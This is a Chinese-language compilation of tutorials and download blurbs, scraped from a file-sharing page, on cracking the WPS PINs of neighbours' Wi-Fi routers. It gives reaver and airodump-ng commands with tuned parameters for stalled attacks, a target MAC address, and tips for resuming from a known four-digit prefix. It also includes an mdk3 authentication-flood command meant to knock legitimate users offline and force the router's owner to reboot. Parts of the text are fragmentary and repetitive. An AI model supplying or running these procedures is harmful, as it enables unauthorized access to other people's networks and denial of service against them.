airmon-ng airmon-ng start wlan0 airodump-ng mon0 apt-get update apt-get install reaver reaver -i mon0 -b 28:2C:B2:5E:79:14 -vv reaver -i mon0 -b 28:2C:B2:5E:79:14 -vv -a -v -S -x 20 -r 100:10 -l 60 -n
路由器防PIN破解
http://download.csdn.net/detail/wugelidong/6486637
http://www.2cto.com/Article/201301/180749.html
http://www.backtrack.org.cn/thread-14804-1-1.html
在坛子里和群里,经常遇到朋友问PIN不动和重码严重如何解决的问题,这的确是一个很棘手的事情,多数情况下很难解决,但并非无路可走,现将本人总结的跑拼之独技奉献给大家:
一、PIN不动和重码严重原因分析及一般应对方法
1、对方路由没开WPS:遇到这种情况,只有一条路可选:放弃跑PIN,抓包吧。
2、一般是信号差:换个好天线或找个好方位。
3、信道干扰严重:半夜起来跑拼,凌晨1点到4点跑还是没改善那就很悲催了。
4、客户端在线,对方电脑开启了防火墙:无端时再跑。
5、路由其他原因:这种情况最复杂,可能被拼死了,需要等待重启,也可能是路由太弱,需要你施展绝技应对。
6、虚拟机运行中出错或网卡断开了连接:重启虚拟机,拔插网卡重新扫描信号。
二、修改水滴参数
除上述一、的第1、6项外,如系2至5原因,可以修改一下水滴参数,或许你会有意外惊喜哦!
目前大家使用较多的cdlinux镜像版本主要包括30211、30513、30608、31214等,其终端处理程序都是一样的,只是个别参数设置有点差异。PIN不动和重码严重时,大家可设置参数如下:
参数一:-a –v –N –x20–r100:10 l300 –t12 –d0 (最佳方案,如想多等会,可将–t12修改为–t15等)
参数二:-a –v –S –x20–r100:10 l300 –t12 –d0 (如重码多且速度太快,可将–d0修改为–d2等)
参数三:-a –v –N –x20–r100:10 l300 –t12 –d0 –S(其他参数也可试一下,不要加-n)
修改完参数后,一定要有耐心让拼码多跑一会,观察一下是否有变化,正常情况下是先慢,然后速度逐步提升,如等待5分钟左右还没动静,那就及时停止,再找机会试吧
http://blog.sina.com.cn/s/blog_61c07ac5010189fz.html
精解reaver用BT5成功PIN解码
PIN码破密特点:
提醒:只限于个人测试使用,由于非法操作引起的相关法律责任与本作者无关。
reaver使用方法、步骤:
1、打开超级终端 ROOt shell
2、如果电脑装有多个无线网卡,请先发指令
4、确认你用哪一个网卡WLAN0或WLAN1
下面的指令都是以单一网卡WLAN0为例
一、激活监听模式:
airodump-ng mon0
四、 抓PIN码:
reaver -i mon0 -b MAC -vv
例如:
特别提示:
只有AP开启了WPS、QSS功能,才可以用PIN法破PSK密码!
如何查看AP是否开了WPS、QSS呢?
一、使用指令:
airodump-ng mon0
MB一栏下,出现 54e. (看清楚有点“.”) 是开WPS的
AP关闭了WPS、或者没有QSS滴,会出现
WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
PIN破密对信号要求极为严格,如果信号稍差,可能导致破密进度变慢或者路由死锁等(重复同一个PIN码 或 timeout),特别是1、6默认频道中,有较多的AP,相互干扰,因此,确定网卡放置的最佳位置、方向、角度十分重要。
破解过程中 ,重复同一个PIN码 或 timeout 可随时随地按Ctrl+C终止,reaver会自动保存进度。
重复第2-4项内容,先看看AP信号强弱或是否关机,若继续破,则再次在终端中发送:
当reaver确定前4位PIN密码后,其工作完成任务进度数值将直接跳跃至90.9%以上,也就是说只剩余一千个密码组合了。总共一万一千个密码。
曙光就在前头,胜利往往在 再坚持一下的努力之中。
如果,90.9%进程后死机或停机,请记下PIN前四位数,用指令:
reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位数)
会从指定PIN段起破密。
ifconfig -a
然后模拟端口:
airmon-ng start wlan0
接下来用:
airodump-ng mon0 //扫描ap找到你pin死的路由器mac
mdk3 mon0 a -a mac(被pin死的路由器的mac)
身份验证攻击效果说明:
此攻击是针对无线AP的洪水攻击,又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超 过了无线AP所能承受的范围,AP就会自动断开现有链接,使合法用户无法使用无线网络。迫使路由主人重启路由器。
说明:
此命令功能强大,使用错误会造成所有ap不能使用,请指定mac地址,然后使用,其余命令不要乱试。你要使用此命令的其他参数,请详细阅读此命令参数详解。
http://wifibeta.com/2012-01/thread-606-1-1.html
http://my.oschina.net/superpdm/blog/70862
http://www.2cto.com/Article/201203/122043.html
使用REAVER破解PIN到90.00%~99.99%问题的解决办法
[+] Trying pin 02835679
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
===================
正常情况下在M4后,会收到WSC NACK包。这是就知道当前的0283是错误的。然后开始试下一个pin.
缺省情况下,如果在M4后没有收到任何包,等待超时后,也会认为当前的pin是错误的,然后开始试下一个pin.
如果是因为丢包的原因,没有收到M5包,显然正确的pin就会当作错误的pin.因此就会出现99.99%的问题。
解决办法很简单:
加上-n 参数即可。
reaver -vvnS -d 0 -b xxxx
注意:reaver 会为每个AP创建一个pin序列文件,这个文件存放在
/etc/reaver/ 或/usr/local/etc/reaver,
文件名字是"AP的MAC".wpc, 例如:AP的MAC是:FF:FF:FF:FF:FF:FF,那么文件名是
FFFFFFFFFFFF.wpc
这个文件也记录,Reaver已经检测到了哪个pin值。例如已经检测到了99985767,这个值在pin序列
中的位置会被记录到文件中,这样就可以中途停掉reaver.下次开始时,还是从99985767开始。
因此在重新启动reaver之前要先删除这个pin序列文件。
高级用法:
注意如果是90.00%那么前四位是没有跑出来的.直接删除文件即可。
如果是99.99%,pin的前四位已经找到了。在删除.wpc文件之前,用reaver 加上-vv参数,记下前四位
的值。然后再删除.wpc文件。重新开始pin时,使用-pin 设置上面记下的前四位pin.这样就直接开始找
后四位的pin值了。
根据reaver的帮助,reaver缺省情况下会自动检查AP是否回应NACK.因此不需要加-n参数才对。
我看了一下代码,这确实是一个bug. 但是通过加-n参数,可以绕过这个bug.
相关推荐
tar-xzvf reaver-1.4.tar.gz cd reaver-1.4 cd src ./configure make
reaver-1.5,reaver-1.5,reaver-1.5,reaver-1.5,reaver-1.5,reaver-1.5,reaver-1.5,reaver-1.5,reaver-1.5,reaver-1.5
Reaver1.4+PIN优化版
CDlinux用的reaver-1.4。
REAVER1.4 CDLINUX 奶瓶下PIN WPA2加密无线网络破解密码
用UltraISO文件打开奶瓶的ISO文件,打开tce文件夹,写入上述文件,存盘退出,用虚拟机启动,启动命令终端,输入reaver-.....,可成功启动
Reaver performs a brute force attack against an access point's WiFi Protected Setup pin number. Once the WPS pin is found, the WPA PSK can be recovered and alternately the AP's wireless settings can...
BEINI1.1添加REAVER1.4方法 1、用winrar解压缩软件解压reaver.rar文件; 2、下载附件中的reaver-1.4专用版.tcz,替换原有的1.3版本 用UltraISO文件打开奶瓶的ISO文件,打开tce文件夹,写入上述文件,存盘退出
reaver-1.4 Beini专用版。增加了reaver所依赖的软件。建议在Beini1.1下使用。使用方法:解压所有tcz文件到tce文件夹下。
reaver1.4使用教程
openwrt,reaver_1.4-1_brcm63xx
关于reaver破解PIN工具教程
reaver 1.4,用于破解无线路由器的密码,tcz格式,需要在linux系统下使用,或者在windows下安装专用软件读取 包含测试文件(使用说明),如果图片无法正常显示请单击图片
reaver-1.4 Beini专用版.tcz
reaver1[1].4最新教程 可以破解WPA 的密码哦
reaver_1.4-2 64位ubuntu安装包
PIN码PJ教程,reaver 使用方法和技巧
优化pin码排序版本的reaver-1.4
支持osx系统的无线破解工具reaver,测试部分功能可以正常使用,喜欢技术分析的大家可以下载尝试下。
玩无线路由器的人都懂得。这版本集成了Reaver1.2.4的图形界面;